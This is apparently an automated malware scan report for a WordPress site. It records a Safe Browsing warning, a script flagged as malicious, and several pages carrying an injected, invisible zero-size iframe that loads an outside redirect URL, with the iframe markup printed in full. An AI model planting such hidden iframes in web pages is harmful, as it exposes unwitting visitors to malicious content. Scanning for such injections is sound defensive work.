Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=haode.yi.org
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://haode.yi.org/ | 200 OK Content-Length: 37255 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 0x0 src: http://s1.slimtrade.com/out.php?s=6871/ <iframe src="http://s1.slimtrade.com/out.php?s=6871/"
sandbox="allow-scripts allow-same-origin"
id="iframe" seamless
width="0%" height="0px"
style="border: 0px solid #dcdcdc;"> | ||
http://haode.yi.org/wp-includes/js/jquery/jquery.js?ver=1.11.2 | 200 OK Content-Length: 95952 Content-Type: application/x-javascript | clean |
http://haode.yi.org/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/x-javascript | clean |
http://s1.slimtrade.com/s6871.js | 200 OK Content-Length: 15157 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: haode.yi.org | ||
http://cdn.popcash.net/pop.js | 200 OK Content-Length: 2863 Content-Type: application/x-javascript | clean |
http://haode.yi.org/dt.js | 200 OK Content-Length: 15465 Content-Type: application/x-javascript | clean |
http://spaces.slimspots.com/adspace/17634.js?wsid= | 200 OK Content-Length: 1313 Content-Type: text/javascript | clean |
http://portaldaputaria.org/scripts/flutuante.js | 200 OK Content-Length: 1912 Content-Type: application/javascript | clean |
http://haode.yi.org/wp-content/themes/asteroid/includes/nav-toggle.js?ver=1.1.9 | 200 OK Content-Length: 373 Content-Type: application/x-javascript | clean |
http://haode.yi.org/?cat=5 | 200 OK Content-Length: 36956 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 0x0 src: http://s1.slimtrade.com/out.php?s=6871/ <iframe src="http://s1.slimtrade.com/out.php?s=6871/"
sandbox="allow-scripts allow-same-origin"
id="iframe" seamless
width="0%" height="0px"
style="border: 0px solid #dcdcdc;"> | ||
http://haode.yi.org/?cat=3 | 200 OK Content-Length: 36952 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 0x0 src: http://s1.slimtrade.com/out.php?s=6871/ <iframe src="http://s1.slimtrade.com/out.php?s=6871/"
sandbox="allow-scripts allow-same-origin"
id="iframe" seamless
width="0%" height="0px"
style="border: 0px solid #dcdcdc;"> | ||
http://haode.yi.org/?cat=2 | 200 OK Content-Length: 36936 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 0x0 src: http://s1.slimtrade.com/out.php?s=6871/ <iframe src="http://s1.slimtrade.com/out.php?s=6871/"
sandbox="allow-scripts allow-same-origin"
id="iframe" seamless
width="0%" height="0px"
style="border: 0px solid #dcdcdc;"> | ||
http://haode.yi.org/?cat=7 | 200 OK Content-Length: 36952 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 0x0 src: http://s1.slimtrade.com/out.php?s=6871/ <iframe src="http://s1.slimtrade.com/out.php?s=6871/"
sandbox="allow-scripts allow-same-origin"
id="iframe" seamless
width="0%" height="0px"
style="border: 0px solid #dcdcdc;"> | ||
http://haode.yi.org/?p=309 | 200 OK Content-Length: 18817 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 0x0 src: http://s1.slimtrade.com/out.php?s=6871/ <iframe src="http://s1.slimtrade.com/out.php?s=6871/"
sandbox="allow-scripts allow-same-origin"
id="iframe" seamless
width="0%" height="0px"
style="border: 0px solid #dcdcdc;"> | ||
http://haode.yi.org//a.yesadsrv.com/display.php?nid=4&zone=84072&type=banner&sid=60010&pid=18050&subid=&opt1=&opt2=/ | 404 Not Found Content-Length: 586 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: haode.yi.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 28 Apr 2015 23:03:13 GMT
Server: kangle/3.4.6
Content-Type: text/html; charset=UTF-8
X-Pingback: http://haode.yi.org/xmlrpc.php
X-Powered-By: PHP/5.3.3
Second query (visit from search engine):
GET / HTTP/1.1
Host: haode.yi.org
Referer: http://www.google.com/search?q=haode.yi.org
Result:
The result is similar to the first query. There are no suspicious redirects found.